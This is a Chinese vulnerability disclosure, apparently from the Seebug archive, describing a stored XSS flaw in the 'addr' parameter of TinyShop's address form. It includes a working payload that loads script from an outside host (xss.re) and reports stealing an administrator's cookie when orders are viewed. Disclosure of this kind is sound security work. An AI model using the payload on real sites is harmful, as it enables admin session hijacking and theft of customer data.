### 简要描述:
rt
### 详细说明:
感觉对于TinyShop来说 xss危害还大一些。。因为sql注入出来的数据 密码md5加盐的 不一定解得出,xss的话除非这个站不要了。不然必定是会触发的。。(商城系统嘛~)
位于 修改地址处。的addr参数,
如果出现同时出现 <>的话 会被过滤,单独出现 就不会过滤,然而我们真的需要同时出现<>才能执行 xss么?
程序员 可以自己做个测试
```
<p> <img src=x onerror="alert(1)" <p>
```
这段代码是否可以alert
修改addr参数为 <img src=x onerror=document.body.appendChild(createElement(/script/.source)).src=alt
alt=http://xss.re/4985 alt=
后台查看订单时触发
[<img src="https://images.seebug.org/upload/201408/10114535aab3c24c74ef445b8cb97868389000ac.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/10114535aab3c24c74ef445b8cb97868389000ac.jpg)
[<img src="https://images.seebug.org/upload/201408/10114544d2712fb1d892e0578f2079b3a9d8c592.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/10114544d2712fb1d892e0578f2079b3a9d8c592.jpg)
成功偷取到管理员的cookie及其他信息
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201408/10114535aab3c24c74ef445b8cb97868389000ac.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/10114535aab3c24c74ef445b8cb97868389000ac.jpg)
[<img src="https://images.seebug.org/upload/201408/10114544d2712fb1d892e0578f2079b3a9d8c592.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/10114544d2712fb1d892e0578f2079b3a9d8c592.jpg)
暂无评论